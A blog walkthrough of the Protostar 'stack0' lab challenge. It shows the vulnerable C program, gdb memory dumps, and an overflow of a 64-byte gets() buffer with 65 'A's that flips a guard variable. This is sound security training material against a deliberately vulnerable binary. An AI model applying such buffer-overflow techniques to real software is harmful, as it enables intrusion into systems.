Encapsulating

Protostar – stack0

Let’s do a Protostar challenge, shall we?

user@protostar:/opt/protostar/bin$ ./stack0 
a
Try again?

Cool, let’s look at the sauce:

 1#include <stdlib.h>
 2#include <unistd.h>
 3#include <stdio.h>
 4
 5int main(int argc, char **argv)
 6{
 7  volatile int modified;
 8  char buffer[64];
 9
10  modified = 0;
11  gets(buffer);
12
13  if(modified != 0) {
14    printf("you have changed the 'modified' variable\n");
15  } else {
16    printf("Try again?\n");
17  }
18}

Looks like we need to change that modified variable, let’s fire up gdb:

 user@protostar:/opt/protostar/bin$ gdb stack0
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/stack0...done.
gdb$ i fu
All defined functions:

File stack0/stack0.c:
int main(int, char **);

Non-debugging symbols:
0x080482bc  _init
0x080482fc  __gmon_start__
0x080482fc  __gmon_start__@plt
0x0804830c  gets
0x0804830c  gets@plt

Non-debugging symbols:
0x080482bc  _init
0x080482fc  __gmon_start__
0x080482fc  __gmon_start__@plt
0x0804830c  gets
0x0804830c  gets@plt
0x0804831c  __libc_start_main
0x0804831c  __libc_start_main@plt
0x0804832c  puts
0x0804832c  puts@plt
0x08048340  _start
0x08048370  __do_global_dtors_aux
0x080483d0  frame_dummy
0x08048440  __libc_csu_fini
0x08048450  __libc_csu_init
0x080484aa  __i686.get_pc_thunk.bx
0x080484b0  __do_global_ctors_aux
0x080484dc  _fini
gdb$ b *0x0804830c
Breakpoint 1 at 0x804830c
gdb$ b *0x0804832c
Breakpoint 2 at 0x804832c
gdb$ run
--------------------------------------------------------------------------
[regs  EAX: 0xBFFFF73C  EBX: 0xB7FD7FF4  ECX: 0x538C18D2  EDX: 0x00000001  o d I t S
  ESI: 0x00000000  EDI: 0x00000000  EBP: 0xBFFFF788  ESP: 0xBFFFF71C  EIP: 0x08
  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007B
--------------------------------------------------------------------------
  EAX: 0x00000000  EBX: 0xB7FD7FF4  ECX: 0xBFFFF73C  EDX: 0xB7FD9334  o d I t s Z a P c 
  ESI: 0x00000000  EDI: 0x00000000  EBP: 0xBFFFF788  ESP: 0xBFFFF71C  EIP: 0x0804832C
  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007B
--------------------------------------------------------------------------
0x804832c <puts@plt>:   jmp    DWORD PTR ds:0x8049638
0x8048332 <puts@plt+6>: push   0x18
0x8048337 <puts@plt+11>:        jmp    0x80482ec
0x804833c:      add    BYTE PTR [eax],al
0x804833e:      add    BYTE PTR [eax],al
0x8048340 <_start>:     xor    ebp,ebp
0x8048342 <_start+2>:   pop    esi
0x8048343 <_start+3>:   mov    ecx,esp
--------------------------------------------------------------------------------

Breakpoint 2, 0x0804832c in puts@plt ()
gdb$ x/x64 0xBFFFF730
A syntax error in expression, near `0xBFFFF730'.
gdb$ x/64x 0xBFFFF730
0xbffff730:     0xb7fd7ff4      0xb7ec6165      0xbffff748      0x41414141
0xbffff740:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff750:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff760:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff770:     0x41414141      0x41414141      0x41414141      0x00000000
0xbffff780:     0x08048450      0x00000000      0xbffff808      0xb7eadc76
0xbffff790:     0x00000001      0xbffff834      0xbffff83c      0xb7fe1848
0xbffff7a0:     0xbffff7f0      0xffffffff      0xb7ffeff4      0x0804824b
0xbffff7b0:     0x00000001      0xbffff7f0      0xb7ff0626      0xb7fffab0
0xbffff7c0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffff7d0:     0xbffff808      0x79db4ec2      0x538c18d2      0x00000000
0xbffff7e0:     0x00000000      0x00000000      0x00000001      0x08048340
0xbffff7f0:     0x00000000      0xb7ff6210      0xb7eadb9b      0xb7ffeff4
0xbffff800:     0x00000001      0x08048340      0x00000000      0x08048361
0xbffff810:     0x080483f4      0x00000001      0xbffff834      0x08048450
0xbffff820:     0x08048440      0xb7ff1040      0xbffff82c      0xb7fff8f8
gdb$

I didn’t count 64 A’s:

 >>> print("A"*64);
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

So we see lots of 0x41414141 in the above gdb dump, followed by a distinct 0x00000000. What’s the bet that this is the modified variable? Let’s try 65 A’s in the buffer and see what happens:

user@protostar:/opt/protostar/bin$ gdb stack0
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/stack0...done.
gdb$ i fu
All defined functions:

File stack0/stack0.c:
int main(int, char **);

Non-debugging symbols:
0x080482bc  _init
0x080482fc  __gmon_start__
0x080482fc  __gmon_start__@plt
0x0804830c  gets
0x0804830c  gets@plt

Non-debugging symbols:
0x080482bc  _init
0x080482fc  __gmon_start__
0x080482fc  __gmon_start__@plt
0x0804830c  gets
0x0804830c  gets@plt
0x0804831c  __libc_start_main
0x0804831c  __libc_start_main@plt
0x0804832c  puts
0x0804832c  puts@plt
0x08048340  _start
0x08048370  __do_global_dtors_aux
0x080483d0  frame_dummy
0x08048440  __libc_csu_fini
0x08048450  __libc_csu_init
0x080484aa  __i686.get_pc_thunk.bx
0x080484b0  __do_global_ctors_aux
0x080484dc  _fini
gdb$ b *0x0804830c
Breakpoint 1 at 0x804830c
gdb$ b *0x0804832c
Breakpoint 2 at 0x804832c
gdb$ run
--------------------------------------------------------------------------
[regs  EAX: 0xBFFFF73C  EBX: 0xB7FD7FF4  ECX: 0xAEF44AC0  EDX: 0x00000001  o d I t S
  ESI: 0x00000000  EDI: 0x00000000  EBP: 0xBFFFF788  ESP: 0xBFFFF71C  EIP: 0x08
  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007B
--------------------------------------------------------------------------
  EAX: 0x00000041  EBX: 0xB7FD7FF4  ECX: 0xBFFFF73C  EDX: 0xB7FD9334  o d I t s z a P c 
  ESI: 0x00000000  EDI: 0x00000000  EBP: 0xBFFFF788  ESP: 0xBFFFF71C  EIP: 0x0804832C
  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007B
--------------------------------------------------------------------------
0x804832c <puts@plt>:   jmp    DWORD PTR ds:0x8049638
0x8048332 <puts@plt+6>: push   0x18
0x8048337 <puts@plt+11>:        jmp    0x80482ec
0x804833c:      add    BYTE PTR [eax],al
0x804833e:      add    BYTE PTR [eax],al
0x8048340 <_start>:     xor    ebp,ebp
0x8048342 <_start+2>:   pop    esi
0x8048343 <_start+3>:   mov    ecx,esp
--------------------------------------------------------------------------------

Breakpoint 2, 0x0804832c in puts@plt ()
gdb$ x/64x 0xBFFFF730
0xbffff730:     0xb7fd7ff4      0xb7ec6165      0xbffff748      0x41414141
0xbffff740:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff750:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff760:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff770:     0x41414141      0x41414141      0x41414141      0x00000041
0xbffff780:     0x08048450      0x00000000      0xbffff808      0xb7eadc76
0xbffff790:     0x00000001      0xbffff834      0xbffff83c      0xb7fe1848
0xbffff7a0:     0xbffff7f0      0xffffffff      0xb7ffeff4      0x0804824b
0xbffff7b0:     0x00000001      0xbffff7f0      0xb7ff0626      0xb7fffab0
0xbffff7c0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffff7d0:     0xbffff808      0x84a31cd0      0xaef44ac0      0x00000000
0xbffff7e0:     0x00000000      0x00000000      0x00000001      0x08048340
0xbffff7f0:     0x00000000      0xb7ff6210      0xb7eadb9b      0xb7ffeff4
0xbffff800:     0x00000001      0x08048340      0x00000000      0x08048361
0xbffff810:     0x080483f4      0x00000001      0xbffff834      0x08048450
0xbffff820:     0x08048440      0xb7ff1040      0xbffff82c      0xb7fff8f8
gdb$ c
you have changed the 'modified' variable

Program exited with code 051.
--------------------------------------------------------------------------[regs]
  EAX:Error while running hook_stop:
No registers.
gdb$

Next..

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s